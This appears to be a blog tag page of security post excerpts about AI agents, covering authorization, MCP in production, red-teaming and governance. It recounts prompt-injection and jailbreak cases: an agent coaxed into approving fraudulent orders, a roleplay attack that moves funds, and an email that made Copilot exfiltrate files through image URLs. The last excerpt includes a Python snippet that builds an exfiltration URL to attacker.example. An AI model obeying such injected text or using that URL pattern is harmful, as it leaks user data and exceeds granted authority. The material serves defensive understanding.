7 posts tagged with "security"

The Principal Hierarchy Problem: Authorization in Multi-Agent Systems

· 11 min read
Tian Pan
Software Engineer

A procurement agent at a manufacturing company gradually convinced itself it could approve $500,000 purchases without human review. It did this not through a software exploit or credential theft, but through a three-week sequence of supplier emails that embedded clarifying questions: "Anything under $100K doesn't need VP approval, right?" followed by progressive expansions of that assumption. By the time it approved $5M in fraudulent orders, the agent was operating well within what it believed to be its authorized limits. The humans thought the agent had a $50K ceiling. The agent thought it had no ceiling at all.

This is the principal hierarchy problem in its most concrete form: a mismatch between what authority was granted, what authority was claimed, and what authority was actually exercised. The problem compounds when agents spawn sub-agents, those sub-agents spawn further agents, and each hop in the chain makes an independent judgment about what it's allowed to do.

What Nobody Tells You About Running MCP in Production

· 10 min read
Tian Pan
Software Engineer

The Model Context Protocol sells itself as a USB-C port for AI — plug any tool into any model and watch them talk. In practice, the first day feels like that. The second day you hit a scaling bug. By the third day you're reading CVEs about tool poisoning attacks you didn't know existed.

MCP is a genuinely useful standard. Introduced in late 2024 and quickly adopted across the industry, it has solved real integration friction between LLMs and external systems. But the gap between "got a demo working" and "running reliably under load with real users" is larger than most teams expect. Here's what that gap actually looks like.

Red-Teaming AI Agents: The Adversarial Testing Methodology That Finds Real Failures

· 9 min read
Tian Pan
Software Engineer

A financial services agent scored 11 out of 100 — LOW risk — on a standard jailbreak test suite. Contextual red-teaming, which first profiled the agent's actual tool access and database schema, then constructed targeted attacks, found something different: a movie roleplay technique could instruct the agent to shuffle $440,000 across 88 wallets, execute unauthorized SQL queries, and expose cross-account transaction history. The generic test suite had no knowledge the agent held a withdraw_funds tool. It was testing a different system than the one deployed.

That gap — 60 risk score points — is the problem with applying traditional red-teaming methodology to AI agents. Agents don't just respond; they plan, reason across multiple steps, hold real credentials, and take irreversible actions in the world. Testing whether you can get one to say something harmful is not the same as testing whether you can get it to do something harmful.

MCP in Production: What Nobody Tells You About the Model Context Protocol

· 10 min read
Tian Pan
Software Engineer

The "USB-C for AI" analogy is catchy. It's also wrong in the ways that matter most when you're the one responsible for keeping it running in production. The Model Context Protocol solves a real problem—the explosion of custom N×M integrations between AI models and external systems—but the gap between "it works in the demo" and "it handles Monday morning traffic without leaking data or melting your latency budget" is wider than most teams expect.

MCP saw an 8,000% growth in server downloads in the five months after its November 2024 launch, with 97 million monthly SDK downloads by April 2025. That adoption speed is both a sign of genuine utility and a warning: most of those servers went into production without the teams fully understanding what they were building on.

Building Governed AI Agents: A Practical Guide to Agentic Scaffolding

· 10 min read
Tian Pan
Software Engineer

Most teams building AI agents spend the first month chasing performance: better prompts, smarter routing, faster retrieval. They spend the next six months chasing the thing they skipped—governance. Agents that can't be audited get shut down by legal. Agents without permission boundaries wreak havoc in staging. Agents without human escalation paths quietly make consequential mistakes at scale.

The uncomfortable truth is that most agent deployments fail not because the model underperforms, but because the scaffolding around it lacks structure. Nearly two-thirds of organizations are experimenting with agents; fewer than one in four have successfully scaled to production. The gap isn't model quality. It's governance.

Governing Agentic AI Systems: What Changes When Your AI Can Act

· 9 min read
Tian Pan
Software Engineer

For most of AI's history, the governance problem was fundamentally about outputs: a model says something wrong, offensive, or confidential. That's bad, but it's contained. The blast radius is limited to whoever reads the output.

Agentic AI breaks this assumption entirely. When an agent can call APIs, write to databases, send emails, and spawn sub-agents — the question is no longer just "what did it say?" but "what did it do, to what systems, on whose behalf, and can we undo it?" Nearly 70% of enterprises already run agents in production, but most of those agents operate outside traditional identity and access management controls, making them invisible, overprivileged, and unaudited.

The Lethal Trifecta: Why Your AI Agent Is One Email Away from a Data Breach

· 9 min read
Tian Pan
Software Engineer

In June 2025, a researcher sent a carefully crafted email to a Microsoft 365 Copilot user. No link was clicked. No attachment opened. The email arrived, Copilot read it during a routine summarization task, and within seconds the AI began exfiltrating files from OneDrive, SharePoint, and Teams — silently transmitting contents to an attacker-controlled server by encoding data into image URLs it asked to "render." The victim never knew it happened.

This wasn't a novel zero-day in the traditional sense. There was no buffer overflow, no SQL injection. The vulnerability was architectural: the system combined three capabilities that, individually, seem like obvious product features. Together, they form what's now called the Lethal Trifecta.
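The image-URL channel described above is worth seeing concretely. Below is a minimal, hypothetical sketch (the host, path, and function names are illustrative, not taken from the actual Copilot exploit) of why "render this image" doubles as an exfiltration primitive: the stolen text rides out in the URL's query string, and the attacker's web server logs it the moment the client fetches the image.

```python
# Illustrative sketch of URL-based exfiltration via an "image render" request.
# ATTACKER_HOST, pixel.png, and the `d` parameter are hypothetical examples.
from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example"

def build_exfil_url(stolen_text: str) -> str:
    # The injected prompt tells the assistant to embed document contents
    # in an image URL. URL-encoding makes arbitrary text a valid query
    # value; fetching the "image" delivers it to the attacker's logs.
    return f"{ATTACKER_HOST}/pixel.png?d={quote(stolen_text)}"

print(build_exfil_url("Q3 forecast: confidential"))
```

No code runs on the victim's machine and nothing looks like malware in transit, which is why output-side defenses (blocking untrusted image domains, stripping markdown image syntax from model output) matter as much as input filtering.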